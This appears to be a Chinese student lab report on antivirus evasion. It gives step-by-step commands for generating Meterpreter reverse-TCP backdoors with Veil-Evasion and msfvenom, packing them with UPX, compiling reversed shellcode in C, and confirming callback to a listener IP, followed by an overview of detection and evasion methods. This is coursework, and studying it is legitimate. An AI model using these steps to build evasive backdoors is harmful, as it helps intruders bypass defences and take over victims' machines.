(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
veil,加壳工具
使用C + shellcode编程
(2)通过组合应用各种技术实现恶意代码免杀
如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。
(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
输入use evasion命令进入Evil-Evasion,输入命令 use c/meterpreter/rev_tcp.py 进入配置界面
输入命令 set LHOST 192.168.227.131 设置反弹连接IP,输入命令 set LPORT 2413 设置端口,输入命令 options 查看配置
输入命令 generate 生成文件
检测veil生成的后门程序
输入upx 20192413MS.exe -o 20192413MSK.exe进行加壳
检测
用msf生成一段shellcode:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.131 LPORT=2413 -f c,并将其中的机器语言段复制到20192413MSc.c文件中
i686-w64-mingw32-g++ 20192413MSc.c -o 20192413MSc.exe编译为可执行文件
检测
通过组合C+shellcode+逆序实现恶意代码免杀
传输到主机中检测免杀成功
回连成功
三种方法:
(1)基于特征码的检测
在每个杀软中都存在一个储存特征码的库,而能识别出来的恶意代码都会有这样的一段或者多段代码,它可以唯一的标识这个恶意代码,并且其他的文件里是没有的。
(2)启发式恶意软件检测
启发式恶意软件检测是通过片面特征推断是否是恶意代码,没有特征码检测那么精确。
(3)基于行为的检测
通过行为识别的,只关心他干了什么事,指通用的、多特征的、非精确的扫描。
一般40%-98%的恶意软件会被杀软检测出来,杀软无法检测出所有的恶意软件。免杀就是通过一些方式例如软件加壳、加密、重新编译等等,让杀软无法检测出来恶意软件。
(1)改变特征码
(2)改变行为
通讯方式
尽量使用反弹式连接
使用隧道技术
加密通讯数据
操作模式
基于内存操作
减少对系统的修改
加入混淆作用的正常功能代码
本次实验中体验了通过多种技术混合实现免杀的过程,相比于简单的后门,实现免杀更加贴合实际生活。在实验中也学会了veil的使用、对文件的加壳处理,对于msf的使用也更加深入。在实验中也出现了很多的状况,尤其是安装veil的过程中每一步基本都需要去查阅资料解决报错,但是通过这些也提高了自己解决问题的能力。